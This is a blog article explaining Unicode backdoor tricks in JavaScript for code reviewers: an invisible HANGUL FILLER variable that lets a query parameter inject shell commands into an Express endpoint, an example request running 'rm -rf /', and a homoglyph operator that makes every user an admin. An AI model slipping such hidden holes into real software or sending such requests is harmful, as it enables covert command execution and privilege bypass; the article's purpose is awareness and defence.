A backdoor is a method to bypass regular authentication or create a "secret entrance" to remotely access a software system without typical authentication. Backdoors attempt to avoid detection through common monitoring methods like code reviews, logging, etc. Imagine being responsible for developing an API system and cleverly creating an endpoint that no one knows about except you, allowing you to easily steal user information.
Because of this, backdoors can cause serious damage to a system due to their "hidden" nature and difficulty to detect. No one knows if a backdoor exists in their system, whether it is stealing or modifying data. In summary, creating an undetectable backdoor is not easy, but once it bypasses detection, the damage is unimaginable.
As a code writer, you may unintentionally or intentionally create a backdoor in the application you are developing using some "extremely clever" techniques that I am going to describe below. Of course, if you are a code reviewer, you should also be aware of these practices to "expose" these highly condemnable actions.
The character "ㅤ" (equivalent to 0x3164 in hexadecimal) is called "HANGUL FILLER". At first glance, it looks like a harmless space or whitespace, hence it is called an "invisible" character. But in reality, this character is considered a letter, so it can be used to name a variable in JavaScript.
const ㅤ = "hello world";
console.log(ㅤ); // hello world
Taking advantage of this property, it can be cleverly used in cases like the following.
const express = require("express");
const util = require("util");
const exec = util.promisify(require("child_process").exec);
const app = express();
app.get("/network_health", async (req, res) => {
const { timeout, ㅤ } = req.query;
const checkCommands = [
"ping -c 1 google.com",
"curl -s http://example.com/",ㅤ
];
try {
await Promise.all(
checkCommands.map(
(cmd) => cmd && exec(cmd, { timeout: +timeout || 5_000 })
)
);
res.status(200);
res.send("ok");
} catch (e) {
res.status(500);
res.send("failed");
}
});
app.listen(8080);
At first glance, this is an API with only one endpoint, /network_health
. When called, it executes 2 commands ping
and curl
. Take a moment to see if you can spot anything unusual in the code snippet above.
Look at line 8:
const { timeout, ㅤ } = req.query;
It seems that there is something after the timeout
variable. Yes, it is the "HANGUL FILLER" character. This means that the attacker is trying to declare a variable as the "HANGUL FILLER" character.
Continuing to line 11. After the comma at the end of the line, it appears to end, but in fact, there is the declared "HANGUL FILLER" variable. So if there is an "HANGUL FILLER" attribute in req.query
, that command will be executed.
A query to the endpoint with the backdoor might look like this:
GET - /network_health?%E3%85%A4%3Drm%20-rf%20%2F
In a more readable form, it is equivalent to:
GET - /network_health?ㅤ = rm -rf /
This means that the command rm -rf /
is executed, which will delete the entire server.
Homoglyph Attacks are a type of attack that uses Unicode characters that closely resemble operators. This causes confusion about a logical operation that may seem normal but is actually not.
const [ENV_PROD, ENV_DEV] = ["PRODUCTION", "DEVELOPMENT"];
const environment = "PRODUCTION";
function isUserAdmin(user) {
if ((environmentǃ=ENV_PROD)) {
return true;
}
return false;
}
The isUserAdmin
function checks whether a user is an admin or not based on the environment variable environment
. If environment
is not "PRODUCTION", then everyone is assumed to be an admin.
The idea is there, but look at line 6.
if ((environmentǃ=ENV_PROD)) {
In reality, the character "ǃ" is not the "!" symbol in the logical expression, but it is a Unicode character that closely resembles the "interrobang" symbol. Therefore, the expression in this if
statement is no longer a logical operation, but an assignment environmentǃ = ENV_PROD
. Thus, if
is always true
, and all users, regardless of the environment, are considered admins.
There are many other characters that resemble characters used in the code that can be used similarly to the above case. For example: "/", "−", "+", "⩵", "❨", "⫽", "꓿", "∗". Unicode calls these characters "confusables".
Using Unicode to create backdoors is not a new idea. However, these tricks are compact, confusing, and flawed. That's why you need to be aware of their existence to increase vigilance.
You should keep these tricks in mind when performing code reviews for unknown or untrusted contributors. This is particularly relevant for open-source projects as they are often contributed to by "completely unknown" developers.
If possible, only use characters in the ASCII character set. Many development teams choose English as their primary development language. Set up tools to warn against code that doesn't adhere to the rules to limit these types of attacks.
VSCode has released a feature in the 1.63 update that highlights invisible characters and confusing characters: https://code.visualstudio.com/updates/v1_63#_unicode-highlighting.
Unicode is also forming a task force to investigate source code spoofing issues: http://blog.unicode.org/2022/03/avoiding-source-code-spoofing.html.
References:
5 profound lessons
Every product comes with stories. The success of others is an inspiration for many to follow. 5 lessons learned have changed me forever. How about you? Click now!
Subscribe to receive new article notifications
Comments (0)